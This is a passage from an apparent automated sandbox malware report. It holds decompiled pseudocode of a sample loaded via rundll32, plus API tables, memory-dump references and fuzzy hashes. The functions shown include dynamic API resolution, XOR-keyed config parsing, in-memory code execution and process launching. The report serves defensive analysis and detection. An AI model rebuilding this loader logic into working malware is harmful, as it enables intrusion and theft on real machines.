							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x435d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x435d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x435d198; // 0x0
										 *_t102 = _t125;
										 *0x435d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x435d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x0435adb4
                                          0x0435adca
                                          0x0435add0
                                          0x0435add2
                                          0x0435add7
                                          0x0435addd
                                          0x0435ade2
                                          0x0435ade5
                                          0x0435adf3
                                          0x0435adfa
                                          0x0435adfd
                                          0x0435ae00
                                          0x0435ae01
                                          0x0435ae04
                                          0x0435ae07
                                          0x0435ae0a
                                          0x0435ae0f
                                          0x0435ae1e
                                          0x00000000
                                          0x0435ae24
                                          0x0435ae2e
                                          0x0435ae38
                                          0x0435ae3d
                                          0x0435ae3f
                                          0x0435ae49
                                          0x0435ae4c
                                          0x0435ae4f
                                          0x0435ae55
                                          0x0435ae57
                                          0x0435ae57
                                          0x0435ae5a
                                          0x0435ae5d
                                          0x0435ae62
                                          0x0435ae66
                                          0x0435ae79
                                          0x0435ae7b
                                          0x0435af23
                                          0x0435af23
                                          0x0435af2a
                                          0x0435af2d
                                          0x0435af37
                                          0x0435af37
                                          0x0435af3b
                                          0x0435afb9
                                          0x0435afbc
                                          0x0435afbe
                                          0x0435afbe
                                          0x0435afc5
                                          0x0435afc7
                                          0x0435afd1
                                          0x0435afd4
                                          0x0435afd7
                                          0x0435afd7
                                          0x00000000
                                          0x0435af3d
                                          0x0435af40
                                          0x0435af6e
                                          0x0435af78
                                          0x0435af7c
                                          0x0435af84
                                          0x0435af87
                                          0x0435af8e
                                          0x0435af98
                                          0x0435af98
                                          0x0435af9c
                                          0x0435afa1
                                          0x0435afb0
                                          0x0435afb6
                                          0x0435afb6
                                          0x0435af9c
                                          0x00000000
                                          0x0435af47
                                          0x0435af4a
                                          0x0435af52
                                          0x0435af67
                                          0x0435af6c
                                          0x00000000
                                          0x00000000
                                          0x0435af6c
                                          0x00000000
                                          0x0435af52
                                          0x0435af40
                                          0x0435af3b
                                          0x0435ae81
                                          0x0435ae88
                                          0x0435ae98
                                          0x0435aea1
                                          0x0435aea5
                                          0x0435aee8
                                          0x0435aef4
                                          0x0435af1d
                                          0x0435aef6
                                          0x0435aefa
                                          0x0435af00
                                          0x0435af08
                                          0x0435af0a
                                          0x0435af0d
                                          0x0435af13
                                          0x0435af15
                                          0x0435af15
                                          0x0435af08
                                          0x0435aefa
                                          0x00000000
                                          0x0435aef4
                                          0x0435aead
                                          0x0435aeb0
                                          0x0435aeb7
                                          0x0435aec7
                                          0x0435aeca
                                          0x0435aeda
                                          0x00000000
                                          0x0435aee0
                                          0x0435aec1
                                          0x0435aec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435aec5
                                          0x0435ae92
                                          0x0435ae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435ae96
                                          0x0435ae6f
                                          0x0435ae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0435AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0435AE9B
                                          • GetLastError.KERNEL32 ref: 0435AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0435AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: f6ef076b3f6a3fa9ad5dc7b92adb9ed13fbc44d81b12bc186d42d7498660fa95
                                          • Instruction ID: 69e806310a957559f6ae21effe5d4810b0b6697abe706a126a3ec4dfe36d2f15
                                          • Opcode Fuzzy Hash: f6ef076b3f6a3fa9ad5dc7b92adb9ed13fbc44d81b12bc186d42d7498660fa95
                                          • Instruction Fuzzy Hash: C8813DB1A00305AFDB11EFA8D884AAEB7F9FF48314F10A129E915E7250E774EA45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043530FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E043530FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x435d33c; // 0x6879bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E04359810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x435c19c;
				}
				_t44 = E043547E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E043558BE(lstrlenW(0x435eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x435eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x435d2a4; // 0x251a5a8
						_t73 =  *0x435d11c; // 0x435abc9
						_t18 = _t75 + 0x435eb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E043558BE(lstrlenW(0x435ec58) + _a8 + _t57 + _t58 + lstrlenW(0x435ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E0435147E(_v16);
						} else {
							_t64 =  *0x435d2a4; // 0x251a5a8
							_t31 = _t64 + 0x435ec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E0435147E(_v8);
				}
				return _v20;
			}


























                                          0x043530fc
                                          0x04353104
                                          0x0435310a
                                          0x0435311a
                                          0x0435311d
                                          0x04353122
                                          0x04353127
                                          0x04353129
                                          0x04353129
                                          0x04353132
                                          0x04353137
                                          0x0435313c
                                          0x04353142
                                          0x0435314c
                                          0x04353155
                                          0x0435315c
                                          0x0435316a
                                          0x0435317c
                                          0x04353181
                                          0x04353186
                                          0x0435318f
                                          0x04353198
                                          0x043531a1
                                          0x043531af
                                          0x043531b7
                                          0x043531bc
                                          0x043531bf
                                          0x043531ca
                                          0x043531e1
                                          0x043531e5
                                          0x04353218
                                          0x043531e7
                                          0x043531ea
                                          0x043531f2
                                          0x043531fd
                                          0x04353205
                                          0x0435320d
                                          0x04353211
                                          0x04353211
                                          0x043531e5
                                          0x04353220
                                          0x04353225
                                          0x0435322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04353111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0435314C
                                          • lstrlen.KERNEL32(?), ref: 04353155
                                          • lstrlen.KERNEL32(00000000), ref: 0435315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0435316A
                                          • lstrlenW.KERNEL32(0435EB38), ref: 04353173
                                          • lstrlen.KERNEL32(?), ref: 043531B7
                                          • lstrlen.KERNEL32(?), ref: 043531BF
                                          • lstrlenW.KERNEL32(?), ref: 043531CA
                                          • lstrlenW.KERNEL32(0435EC58), ref: 043531D3
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: e638c137cf6a950b943b62984f95efcffeaafa0d3b6d771fee02ef0e60505e60
                                          • Instruction ID: 03c0b004936ef1521e47f01c84777134dd68d079da48bb09bc10a384d4df94eb
                                          • Opcode Fuzzy Hash: e638c137cf6a950b943b62984f95efcffeaafa0d3b6d771fee02ef0e60505e60
                                          • Instruction Fuzzy Hash: 63316772D00209ABDF02AFA4DC44DAEBBB9EF08348F119091ED14A7220DB35EA11DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04351493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E04351493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E043557D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x435d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x435d2a4; // 0x251a5a8
					_t18 = _t46 + 0x435e3e6; // 0x73797325
					_t66 = E043577E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x435d2a4; // 0x251a5a8
						_t19 = _t49 + 0x435e747; // 0x6878cef
						_t20 = _t49 + 0x435e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0435684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0435684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x435d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E0435147E(_t68);
				goto L12;
			}



















                                          0x0435149b
                                          0x0435149b
                                          0x043514aa
                                          0x043514b1
                                          0x043514b6
                                          0x043515c6
                                          0x043515cd
                                          0x043515cd
                                          0x043514c5
                                          0x043514d0
                                          0x043514d3
                                          0x043514d8
                                          0x043514ed
                                          0x043514f3
                                          0x043514f4
                                          0x043514f7
                                          0x043514fd
                                          0x04351500
                                          0x04351505
                                          0x0435150d
                                          0x04351519
                                          0x0435151d
                                          0x043515ad
                                          0x04351523
                                          0x04351523
                                          0x04351528
                                          0x0435152f
                                          0x04351543
                                          0x04351547
                                          0x04351596
                                          0x04351549
                                          0x0435154a
                                          0x04351551
                                          0x0435156a
                                          0x0435156c
                                          0x04351570
                                          0x04351577
                                          0x04351591
                                          0x04351579
                                          0x04351582
                                          0x04351587
                                          0x04351587
                                          0x04351577
                                          0x043515a5
                                          0x043515a5
                                          0x0435151d
                                          0x043515b4
                                          0x043515bd
                                          0x043515c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 043557D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,043514AF,?,?,?,?,00000000,00000000), ref: 043557FD
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0435581F
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04355835
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0435584B
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04355861
                                            • Part of subcall function 043557D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04355877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 043514C5
                                          • memset.NTDLL ref: 04351500
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0435333A,73797325), ref: 043577F7
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04357811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06878CEF,73797325), ref: 04351536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0435153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043515A5
                                            • Part of subcall function 0435684E: GetProcAddress.KERNEL32(36776F57,0435935F), ref: 04356869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04351582
                                          • CloseHandle.KERNEL32(?), ref: 04351587
                                          • GetLastError.KERNEL32(00000001), ref: 0435158B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 6091b296c40c648f875a0d646273937bcbd84cbab3872c70a3e672b40b82d10a
                                          • Instruction ID: f56d369983625c27638c94e6831bdf5dfbfbb77771c3472b1e1ebda9d8b4aa52
                                          • Opcode Fuzzy Hash: 6091b296c40c648f875a0d646273937bcbd84cbab3872c70a3e672b40b82d10a
                                          • Instruction Fuzzy Hash: 003110B6D00208AFDF11AFA4DC89EAEBBBCEF08344F105565EA06A7121D775AE44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04354D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E04354D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x435d2a4; // 0x251a5a8
				_t1 = _t9 + 0x435e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04356027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E043558BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04356F33(_t34, _t41, _a8);
						E0435147E(_t41);
						_t42 = E04354759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0435147E(_t36);
							_t36 = _t42;
						}
						_t43 = E04354858(_t36, _t33);
						if(_t43 != 0) {
							E0435147E(_t36);
							_t36 = _t43;
						}
					}
					E0435147E(_t28);
				}
				return _t36;
			}














                                          0x04354d2c
                                          0x04354d2f
                                          0x04354d30
                                          0x04354d38
                                          0x04354d3f
                                          0x04354d46
                                          0x04354d4a
                                          0x04354d50
                                          0x04354d57
                                          0x04354d5c
                                          0x04354d6e
                                          0x04354d72
                                          0x04354d76
                                          0x04354d7c
                                          0x04354d81
                                          0x04354d91
                                          0x04354d93
                                          0x04354daa
                                          0x04354dae
                                          0x04354db1
                                          0x04354db6
                                          0x04354db6
                                          0x04354dbf
                                          0x04354dc3
                                          0x04354dc6
                                          0x04354dcb
                                          0x04354dcb
                                          0x04354dc3
                                          0x04354dce
                                          0x04354dce
                                          0x04354dd9

                                          APIs
                                            • Part of subcall function 04356027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04354D46,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?), ref: 0435608E
                                            • Part of subcall function 04356027: sprintf.NTDLL ref: 043560AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,043552FE,?,068795B0), ref: 04354D57
                                          • lstrlen.KERNEL32(?,?,?,043552FE,?,068795B0), ref: 04354D5F
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • strcpy.NTDLL ref: 04354D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04354D81
                                            • Part of subcall function 04356F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04354D90,00000000,?,?,?,043552FE,?,068795B0), ref: 04356F4A
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,043552FE,?,068795B0), ref: 04354D9E
                                            • Part of subcall function 04354759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04354DAA,00000000,?,?,043552FE,?,068795B0), ref: 04354763
                                            • Part of subcall function 04354759: _snprintf.NTDLL ref: 043547C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 1f9ac2a1281af30b9781132deb59c325c744abeead5e68f1b744672061caf5ce
                                          • Instruction ID: 492522963682976e2b3a9511022cc2699577064366e35e5fdfe2ff37e585fe59
                                          • Opcode Fuzzy Hash: 1f9ac2a1281af30b9781132deb59c325c744abeead5e68f1b744672061caf5ce
                                          • Instruction Fuzzy Hash: 9011C673A01225775A167BF89C44D7F3AADDE496687157115FD04AB120CE38FD4287A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043598F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E043598F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x435d2a0; // 0x59935a40
				if(E043596D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x435d2d0 = _v12;
				}
				_t23 =  *0x435d2a0; // 0x59935a40
				if(E043596D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x435d2a0; // 0x59935a40
						_t29 = E043510CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x435d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x435d2a0; // 0x59935a40
						_t30 = E043510CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x435d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x435d2a0; // 0x59935a40
						_t31 = E043510CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x435d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x435d2a0; // 0x59935a40
						_t32 = E043510CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x435d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x435d2a0; // 0x59935a40
						_t33 = E043510CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x435d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x435d2a0; // 0x59935a40
						_t34 = E043510CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E0435A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E04359B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x435d2a0; // 0x59935a40
						_t35 = E043510CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E0435A2EF(0, _t35) != 0) {
						_t86 =  *0x435d324; // 0x68795b0
						E04354C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x435d238, 0, _t70);
					return 0;
				}
			}





























                                          0x043598f7
                                          0x043598f7
                                          0x043598f7
                                          0x043598f7
                                          0x043598fa
                                          0x043598fb
                                          0x043598fc
                                          0x04359916
                                          0x04359924
                                          0x04359924
                                          0x04359929
                                          0x04359943
                                          0x04359ad2
                                          0x04359ad4
                                          0x04359949
                                          0x04359949
                                          0x0435994a
                                          0x0435994d
                                          0x0435994e
                                          0x04359953
                                          0x04359969
                                          0x04359955
                                          0x04359955
                                          0x04359962
                                          0x04359962
                                          0x04359973
                                          0x04359975
                                          0x0435997f
                                          0x04359984
                                          0x04359984
                                          0x0435997f
                                          0x0435998b
                                          0x043599a1
                                          0x0435998d
                                          0x0435998d
                                          0x0435999a
                                          0x0435999a
                                          0x043599a5
                                          0x043599a7
                                          0x043599b1
                                          0x043599b6
                                          0x043599b6
                                          0x043599b1
                                          0x043599bd
                                          0x043599d3
                                          0x043599bf
                                          0x043599bf
                                          0x043599cc
                                          0x043599cc
                                          0x043599d7
                                          0x043599d9
                                          0x043599e3
                                          0x043599e8
                                          0x043599e8
                                          0x043599e3
                                          0x043599ef
                                          0x04359a05
                                          0x043599f1
                                          0x043599f1
                                          0x043599fe
                                          0x043599fe
                                          0x04359a09
                                          0x04359a0b
                                          0x04359a15
                                          0x04359a1a
                                          0x04359a1a
                                          0x04359a15
                                          0x04359a21
                                          0x04359a37
                                          0x04359a23
                                          0x04359a23
                                          0x04359a30
                                          0x04359a30
                                          0x04359a3b
                                          0x04359a3d
                                          0x04359a47
                                          0x04359a4c
                                          0x04359a4c
                                          0x04359a47
                                          0x04359a53
                                          0x04359a69
                                          0x04359a55
                                          0x04359a55
                                          0x04359a62
                                          0x04359a62
                                          0x04359a6d
                                          0x04359a6f
                                          0x04359a72
                                          0x04359a73
                                          0x04359a7a
                                          0x04359a7c
                                          0x04359a7d
                                          0x04359a7d
                                          0x04359a7a
                                          0x04359a84
                                          0x04359a9a
                                          0x04359a86
                                          0x04359a86
                                          0x04359a93
                                          0x04359a93
                                          0x04359a9e
                                          0x04359aac
                                          0x04359ab6
                                          0x04359ab6
                                          0x04359ac3
                                          0x04359acf
                                          0x04359acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 0435997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 043599AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 043599DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04354A8B), ref: 04359AC3
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 841eb0cbf1c6860047b725ee96f52a9f0796953476541015af369f7161cb62ff
                                          • Instruction ID: 6384d66d0ac7126d8c2fb334adaa2ae197fe8e850ac01688735b0a51f80e985b
                                          • Opcode Fuzzy Hash: 841eb0cbf1c6860047b725ee96f52a9f0796953476541015af369f7161cb62ff
